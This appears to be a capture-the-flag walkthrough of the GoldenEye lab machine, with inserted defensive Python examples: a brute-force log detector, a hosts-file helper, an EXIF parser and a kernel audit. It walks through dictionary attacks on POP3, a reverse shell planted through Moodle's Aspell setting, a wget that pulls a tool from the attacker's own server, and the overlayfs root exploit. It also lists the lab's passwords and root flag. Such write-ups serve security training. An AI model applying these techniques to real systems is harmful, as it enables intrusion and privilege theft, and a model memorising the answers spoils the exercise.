GoldenEye

Intro & Enumeration


This room will be a guided challenge to hack the James Bond-styled box and get root.

Credit to creosote for creating this VM. This machine is used here with the explicit permission of the creator <3

So... Let's get started!

Answer the questions below

First things first, connect to our network and deploy the machine.

Question Done

Use nmap to scan the network for all ports. How many ports are open?

4

Take a look at the website, dive into the source code too, and remember to inspect all scripts!

Question Done

Who needs to make sure they update their default password?

Boris

What's their password?

InvincibleHack3r

Now go use those credentials and login to a part of the site.

Question Done

It's mail time...

On to the next steps...

Answer the questions below

Take a look at some of the other services you found using your nmap scan. Are the credentials you have reusable?

Question Done

If those creds don't seem to work, can you use another program to find other users and passwords? Maybe Hydra? What's their new password?

pop3

secret1!
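The dictionary attack against POP3 described above, seen from the defender's side. This is an added example, not part of the room or the VM: it runs simple brute-force detection over a few constructed log lines loosely modelled on a POP3 daemon's auth log (the field layout, the IPs and the timestamps are assumptions; adapt the regex to your own server's format). It flags a source that fails authentication more than a threshold number of times inside a sliding window, and separately flags a successful login from that same source shortly afterwards, which is the pattern a successful dictionary attack leaves behind.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines; the format is an assumption, not a real daemon's output.
SAMPLE_LOG = """\
2024-01-01T10:00:01 mail pop3-login: auth failed user=natalya rip=10.0.0.5
2024-01-01T10:00:01 mail pop3-login: auth failed user=natalya rip=10.0.0.5
2024-01-01T10:00:02 mail pop3-login: auth failed user=natalya rip=10.0.0.5
2024-01-01T10:00:02 mail pop3-login: auth failed user=natalya rip=10.0.0.5
2024-01-01T10:00:03 mail pop3-login: auth failed user=natalya rip=10.0.0.5
2024-01-01T10:00:04 mail pop3-login: auth failed user=natalya rip=10.0.0.5
2024-01-01T10:00:05 mail pop3-login: login ok user=natalya rip=10.0.0.5
2024-01-01T10:05:00 mail pop3-login: auth failed user=boris rip=10.0.0.9
2024-01-01T10:30:00 mail pop3-login: login ok user=boris rip=10.0.0.9
"""

LOG_RE = re.compile(
    r"^(?P<ts>\S+) \S+ pop3-login: (?P<result>auth failed|login ok) "
    r"user=(?P<user>\S+) rip=(?P<ip>\S+)$"
)
WINDOW = timedelta(seconds=60)   # sliding window for counting failures
THRESHOLD = 5                    # failures inside the window that trigger an alert


def parse_line(line):
    """Return a dict for a recognised line, or None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ts": datetime.fromisoformat(m["ts"]),
        "ok": m["result"] == "login ok",
        "user": m["user"],
        "ip": m["ip"],
    }


def detect(lines, threshold=THRESHOLD, window=WINDOW):
    """Scan log lines in order and return a list of alert dicts."""
    failures = defaultdict(list)   # ip -> timestamps of failures still inside the window
    flagged = {}                   # ip -> time the brute-force alert was raised
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        ip, ts = ev["ip"], ev["ts"]
        # Expire old failures and old alerts so the detector re-arms after a quiet period.
        failures[ip] = [t for t in failures[ip] if ts - t <= window]
        if ip in flagged and ts - flagged[ip] > window:
            del flagged[ip]
        if not ev["ok"]:
            failures[ip].append(ts)
            if len(failures[ip]) >= threshold and ip not in flagged:
                flagged[ip] = ts
                alerts.append({"type": "bruteforce", "ip": ip, "user": ev["user"],
                               "count": len(failures[ip]), "ts": ts})
        elif ip in flagged:
            # A success from a source that was just brute-forcing is the high-value signal.
            alerts.append({"type": "success_after_bruteforce", "ip": ip,
                           "user": ev["user"], "ts": ts})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(alert)
```

The single failure from 10.0.0.9 followed by a login 25 minutes later never reaches the threshold and produces nothing; the burst from 10.0.0.5 produces one brute-force alert on the fifth failure and a second alert when the login succeeds two seconds later. Per-source counting is what makes the second alert possible; counting per user only would miss a password spray across many accounts.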

Inspect port 55007. What service is configured to use this port?

telnet

Login using that service and the credentials you found earlier.

Question Done

What can you find on this service?

emails

What user can break Boris' codes?

natalya

Using the users you found on this service, find other users' passwords.

Question Done

Keep enumerating users using this service and keep attempting to obtain their passwords via dictionary attacks.

You will eventually get xenia's password in plaintext.

Completed

GoldenEye Operators Training

Enumeration really is key. Making notes and referring back to them can be lifesaving. We shall now go onto getting a user shell.

Answer the questions below

If you remember, some of the emails you discovered mention the severnaya-station.com website. To get it resolving, you need to update your DNS records to reveal it.

If you're on Linux, edit your "/etc/hosts" file and add:

If you're on Windows, do the same but in the "c:\Windows\System32\Drivers\etc\hosts" file.

Completed
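The hosts-file step above, done idempotently. This is an added Python helper, not part of the room: it adds a hostname-to-IP mapping to a hosts file if it is missing, repairs it if a stale line already maps that hostname to a different IP (keeping any other hostnames on that line), and leaves the file alone when the mapping is already correct. The IP `10.10.10.10` in the demo is a constructed placeholder; substitute the machine's IP from your own nmap scan, and on a real system point it at `/etc/hosts` (with the privileges that requires).

```python
import os
import tempfile


def ensure_hosts_entry(hosts_path, ip, hostname):
    """Add or repair `hostname -> ip` in a hosts file. Returns True if the file changed."""
    with open(hosts_path, "r", encoding="utf-8") as f:
        lines = f.read().splitlines()

    out, changed, present = [], False, False
    for line in lines:
        body, _, comment = line.partition("#")
        fields = body.split()
        if len(fields) < 2 or hostname not in fields[1:]:
            out.append(line)                 # unrelated line: keep verbatim
            continue
        if fields[0] == ip:
            present = True                   # already correct: keep verbatim
            out.append(line)
            continue
        # Stale mapping: drop our hostname from this line but keep its other names.
        others = [h for h in fields[1:] if h != hostname]
        if others:
            rebuilt = f"{fields[0]}\t{' '.join(others)}"
            out.append(rebuilt + (f" #{comment}" if comment else ""))
        changed = True

    if not present:
        out.append(f"{ip}\t{hostname}")
        changed = True

    if changed:
        with open(hosts_path, "w", encoding="utf-8") as f:
            f.write("\n".join(out) + "\n")
    return changed


def demo_hosts_update(ip="10.10.10.10", hostname="severnaya-station.com"):
    """Run the helper against a temporary hosts file. Returns (first, second, third, content)."""
    fd, path = tempfile.mkstemp(suffix=".hosts")
    os.close(fd)
    try:
        with open(path, "w", encoding="utf-8") as f:
            # Constructed starting content with a stale mapping sharing a line with another name.
            f.write("127.0.0.1\tlocalhost\n192.0.2.1\tother.example severnaya-station.com # old\n")
        first = ensure_hosts_entry(path, ip, hostname)    # repairs the stale line
        second = ensure_hosts_entry(path, ip, hostname)   # nothing to do
        third = ensure_hosts_entry(path, "192.0.2.99", hostname)  # IP changed again
        with open(path, encoding="utf-8") as f:
            content = f.read()
    finally:
        os.unlink(path)
    return first, second, third, content


if __name__ == "__main__":
    print(demo_hosts_update()[3])
```

Running the helper twice with the same arguments changes the file only the first time, which is what makes it safe to put in a setup script you re-run for every session.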

Once you have done that, in your browser navigate to: http://severnaya-station.com/gnocertdir

Completed

Try using the credentials you found earlier. Which user can you login as?

xenia

Have a poke around the site. What other user can you find?

doak

What was this user's password?

pop3 + hydra

goat

Use this user's credentials to go through all the services you have found to reveal more emails.

Completed

What is the next user you can find from doak?

Emails, emails, emails...

dr_doak

What is this user's password?

4England!

Take a look at their files on the Moodle site (severnaya-station.com).

Completed

Download the attachments and see if there are any hidden messages inside them.

Use exiftool

Completed
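To show what exiftool is actually reading when it surfaces a hidden message in an attachment, here is an added example (not code from the room or the VM) that walks the segment structure of a JPEG by hand, pulls the text out of the COM comment segment and the ASCII tags of the EXIF IFD0, and checks whether any of that text decodes as base64 to readable characters. The sample image is constructed inline, so the description and comment values are assumptions; the marker bytes and the TIFF/IFD layout are the real format. The scanner stops at the SOS marker because everything after it is entropy-coded pixel data rather than metadata.

```python
import base64
import binascii
import struct

# Standard TIFF ASCII tags commonly found in IFD0.
ASCII_TAGS = {0x010E: "ImageDescription", 0x010F: "Make", 0x0110: "Model",
              0x013B: "Artist", 0x8298: "Copyright"}


def build_sample_jpeg(description: bytes, comment: bytes) -> bytes:
    """Constructed minimal JPEG: SOI, APP1/Exif with one ImageDescription, COM, EOI."""
    desc = description + b"\x00"                 # ASCII values are NUL-terminated
    assert len(desc) > 4, "builder always stores the string out-of-line"
    ifd_offset = 8                                # IFD0 directly after the 8-byte TIFF header
    data_offset = ifd_offset + 2 + 12 + 4         # count + one entry + next-IFD pointer
    tiff = b"II" + struct.pack("<HI", 42, ifd_offset)
    tiff += struct.pack("<H", 1)
    tiff += struct.pack("<HHII", 0x010E, 2, len(desc), data_offset)   # type 2 = ASCII
    tiff += struct.pack("<I", 0) + desc
    exif_payload = b"Exif\x00\x00" + tiff
    app1 = b"\xff\xe1" + struct.pack(">H", len(exif_payload) + 2) + exif_payload
    com = b"\xff\xfe" + struct.pack(">H", len(comment) + 2) + comment
    return b"\xff\xd8" + app1 + com + b"\xff\xd9"


def jpeg_segments(data: bytes):
    """Yield (marker, payload) for each length-carrying segment before SOS/EOI."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (missing SOI)")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected marker at offset {pos}")
        marker = data[pos + 1]
        if marker in (0xD9, 0xDA):                     # EOI or SOS: metadata is over
            break
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:   # stand-alone markers carry no length
            pos += 2
            continue
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        yield marker, data[pos + 4:pos + 2 + length]
        pos += 2 + length


def exif_ascii_tags(tiff: bytes) -> dict:
    """Parse IFD0 of a TIFF block and return {tag_number: text} for ASCII entries."""
    byte_order = {b"II": "<", b"MM": ">"}[tiff[:2]]
    magic, ifd_off = struct.unpack(byte_order + "HI", tiff[2:8])
    if magic != 42:
        raise ValueError("bad TIFF magic")
    (count,) = struct.unpack(byte_order + "H", tiff[ifd_off:ifd_off + 2])
    tags = {}
    for i in range(count):
        e = ifd_off + 2 + 12 * i
        tag, typ, n, value = struct.unpack(byte_order + "HHII", tiff[e:e + 12])
        if typ != 2:
            continue
        raw = tiff[e + 8:e + 8 + n] if n <= 4 else tiff[value:value + n]  # inline if it fits
        tags[tag] = raw.rstrip(b"\x00").decode("ascii", "replace")
    return tags


def scan_jpeg_metadata(data: bytes) -> dict:
    """Collect text from the COM segment and EXIF IFD0 ASCII tags."""
    found = {}
    for marker, payload in jpeg_segments(data):
        if marker == 0xFE:
            found["Comment"] = payload.decode("latin-1")
        elif marker == 0xE1 and payload.startswith(b"Exif\x00\x00"):
            for tag, text in exif_ascii_tags(payload[6:]).items():
                found[ASCII_TAGS.get(tag, f"Tag{tag:04X}")] = text
    return found


def decode_if_base64(text: str):
    """Return the decoded string if `text` is valid base64 of printable ASCII, else None."""
    try:
        raw = base64.b64decode(text, validate=True)
    except (ValueError, binascii.Error):
        return None
    if raw and all(32 <= b < 127 or b in (9, 10, 13) for b in raw):
        return raw.decode("ascii")
    return None


# Constructed sample: a base64 string hidden in ImageDescription plus a plain comment.
SAMPLE_JPEG = build_sample_jpeg(base64.b64encode(b"constructed secret"), b"constructed comment")

if __name__ == "__main__":
    for field, text in scan_jpeg_metadata(SAMPLE_JPEG).items():
        print(f"{field}: {text!r} -> {decode_if_base64(text)!r}")
```

The same walk explains why such messages survive casual viewing: image viewers ignore APP1 and COM segments entirely, so text placed there is invisible until a metadata tool reads those segments explicitly.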

Using the information you found in the last task, login with the newly found user.

Completed

As this user has more site privileges, you are able to edit the Moodle settings. From here, get a reverse shell using Python and netcat.

Take a look into Aspell, the spell checker plugin.

In the Settings -> Aspell -> "Path to aspell" field, add your code to be executed. Then create a new page and "spell check it".

Completed

Privilege Escalation

Now that you have enumerated enough to get an administrative Moodle login and gain a reverse shell, it's time to privesc.

Answer the questions below

Download linuxprivchecker to enumerate the installed development tools.

To get the file onto the machine, you will need to wget it from your local machine, as the VM cannot fetch files from the internet. Follow these steps to get a file onto the VM:

  • Download the linuxprivchecker file locally

  • Navigate to the file on your file system

  • Do: python -m SimpleHTTPServer 1337 (leave this running)

  • On the VM you can now do: wget http://<your-ip>:1337/<filename>.py (where <your-ip> is the address of the machine running the HTTP server)

OR

Enumerate the machine manually.

Completed

What's the kernel version?

uname -a

3.13.0-32-generic

This machine is vulnerable to the overlayfs exploit. The exploitation is technically very simple:

  • Create new user and mount namespace using clone with CLONE_NEWUSER|CLONE_NEWNS flags.

  • Mount an overlayfs using /bin as lower filesystem, some temporary directories as upper and work directory.

  • The overlayfs mount is only visible within the user namespace, so let the namespace process change its CWD to the overlayfs, making the overlayfs also visible outside the namespace via the proc filesystem.

  • Make su on the overlayfs world writable without changing the owner.

  • Let process outside user namespace write arbitrary content to the file applying a slightly modified variant of the SetgidDirectoryPrivilegeEscalation exploit.

  • Execute the modified su binary

You can download the exploit from here: https://www.exploit-db.com/exploits/37292
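The list above names the two conditions the technique needs: a kernel from before the overlayfs fix, and the ability of an unprivileged process to create a user namespace. The following is an added example, not code from the room or from the exploit: a small defender's audit that parses an Ubuntu-style `uname -r` string, compares it with the release the distribution fixed (the `PATCHED_RELEASE` value here is a placeholder assumption; take the real one from your distro's security advisory for this issue), and reports whether unprivileged user namespaces are switched on via the `kernel.unprivileged_userns_clone` sysctl that Debian-derived kernels provide (its presence is an assumption about your kernel; the function reports when the file is absent). The ABI comparison is only meaningful within one distro kernel series.

```python
import re

# Placeholder assumption: the distro release that shipped the overlayfs fix.
# Replace with the version from your distribution's advisory before relying on it.
PATCHED_RELEASE = "3.13.0-55-generic"

# Debian/Ubuntu-specific switch; absent on kernels without that patch.
USERNS_SYSCTL_PATH = "/proc/sys/kernel/unprivileged_userns_clone"

RELEASE_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-(\d+))?")


def parse_release(release: str):
    """Turn '3.13.0-32-generic' into (3, 13, 0, 32) so releases compare as tuples."""
    m = RELEASE_RE.match(release)
    if not m:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    major, minor, patch, abi = m.groups()
    return (int(major), int(minor), int(patch), int(abi) if abi else 0)


def assess(release: str, unprivileged_userns_clone=None, patched: str = PATCHED_RELEASE):
    """Return a list of findings (empty means neither precondition was observed)."""
    findings = []
    if parse_release(release) < parse_release(patched):
        findings.append(
            f"kernel {release} predates {patched}: install the fixed kernel and reboot")
    if unprivileged_userns_clone is None:
        findings.append(
            f"{USERNS_SYSCTL_PATH} not present: confirm user-namespace policy another way")
    elif unprivileged_userns_clone.strip() == "1":
        findings.append(
            "unprivileged user namespaces enabled: set kernel.unprivileged_userns_clone=0 "
            "unless a workload needs them")
    return findings


def read_sysctl(path: str = USERNS_SYSCTL_PATH):
    """Read a /proc/sys value, or None when the kernel does not expose it."""
    try:
        with open(path, encoding="ascii") as f:
            return f.read().strip()
    except OSError:
        return None


if __name__ == "__main__":
    import platform
    for finding in assess(platform.release(), read_sysctl()):
        print("-", finding)
    else:
        print("no findings" if not assess(platform.release(), read_sysctl()) else "")
```

Run it on the box after `uname -a` and it gives the same answer the room expects, but with the reasoning made explicit: the release is older than the fix and nothing stops an unprivileged user from entering a new user namespace, so the mount step in the list above is reachable.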

Completed

Fix the exploit to work with the system you're trying to exploit. Remember, enumeration is your key!

What development tools are installed on the machine?

It's a VERY simple fix. You're only changing 1 character...

Completed

The flag is located in the root user's home folder.

What is the root flag?

568628e0d993b1973adc718237da6e93
